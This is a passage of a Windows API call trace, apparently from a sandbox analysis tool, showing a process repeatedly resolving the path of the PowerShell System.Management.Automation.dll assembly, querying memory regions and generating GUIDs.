	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] VirtualQuery (in: lpAddress=0x24b9f0, lpBuffer=0x24c8b0, dwLength=0x30 | out: lpBuffer=0x24c8b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.969] VirtualQuery (in: lpAddress=0x24b0e0, lpBuffer=0x24bfa0, dwLength=0x30 | out: lpBuffer=0x24bfa0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.970] VirtualQuery (in: lpAddress=0x24b170, lpBuffer=0x24c030, dwLength=0x30 | out: lpBuffer=0x24c030*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.970] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.970] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.971] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0383.470] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.471] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.475] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.475] VirtualQuery (in: lpAddress=0x24b520, lpBuffer=0x24c3e0, dwLength=0x30 | out: lpBuffer=0x24c3e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.475] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.475] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.476] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.476] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.476] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x24d277b9, Data2=0x1885, Data3=0x4087, Data4=([0]=0x88, [1]=0x29, [2]=0x2, [3]=0x57, [4]=0x1c, [5]=0xd9, [6]=0x95, [7]=0x9a))) returned 0x0
	[0383.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.480] VirtualQuery (in: lpAddress=0x24b0e0, lpBuffer=0x24bfa0, dwLength=0x30 | out: lpBuffer=0x24bfa0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.480] VirtualQuery (in: lpAddress=0x24b170, lpBuffer=0x24c030, dwLength=0x30 | out: lpBuffer=0x24c030*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] VirtualQuery (in: lpAddress=0x24b390, lpBuffer=0x24c250, dwLength=0x30 | out: lpBuffer=0x24c250*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x19995b5b, Data2=0x55c5, Data3=0x4b6a, Data4=([0]=0xbb, [1]=0xd, [2]=0x2a, [3]=0xdf, [4]=0x99, [5]=0x1a, [6]=0x6a, [7]=0xf7))) returned 0x0
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.483] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa89a5bb2, Data2=0x4a7, Data3=0x4f96, Data4=([0]=0x84, [1]=0x27, [2]=0xcc, [3]=0x94, [4]=0xbf, [5]=0x1, [6]=0x3c, [7]=0xd8))) returned 0x0
